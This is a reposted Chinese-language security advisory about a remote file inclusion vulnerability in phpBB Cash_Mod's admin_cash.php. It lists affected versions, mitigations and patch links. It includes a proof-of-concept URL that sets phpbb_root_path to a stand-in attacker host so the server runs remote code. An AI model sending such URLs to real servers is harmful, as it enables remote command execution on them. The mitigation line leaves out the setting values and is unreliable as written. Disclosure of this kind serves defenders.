[转载]phpBB Cash_Mod模块远程文件包含漏洞以及测试方法

信息来源：nsfocus

发布日期：2004-11-18
更新日期：2004-11-19

受影响系统：
phpBB Group Cash Mod 2.2.0
phpBB Group Cash Mod 2.0.2
phpBB Group Cash Mod 2.0.0
不受影响系统：
phpBB Group Cash Mod 2.2.2
描述：
--------------------------------------------------------------------------------
phpBB是一款使用多种模块扩展的流行的论坛系统。

phpBB '/admin/admin_cash.php'不正确过滤用户提交的URL参数，远程攻击者可以利用这个漏洞以进程权限在系统上执行任意命令。

由于/admin/admin_cash.php'对'$phpbb_root_path'变量值缺少正确的过滤，指定远程服务器上的恶意文件作为包含文件参数，可以WEB进程权限执行恶意文件中的任意命令。

<*来源：Jerome ATHIAS （jerome.athias@caramail.com）
  
  链接：http://marc.theaimsgroup.com/?l= ... 75903308817&w=2
*>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Jerome ATHIAS （jerome.athias@caramail.com）提供了如下测试方法：

http://victim.host/phpBB2/admin/ ... th=http://bad.host/

建议：
--------------------------------------------------------------------------------
临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* 在Php.ini文件中设置如下选项allow_url_fopen和register_globals。

厂商补丁：

phpBB Group
-----------
可下载如下补丁：

http://www.phpbb.com/phpBB/viewtopic.php?p=1319332#1319332


或者下载最新的程序：

http://www.phpbb.com/phpBB/viewtopic.php?t=94055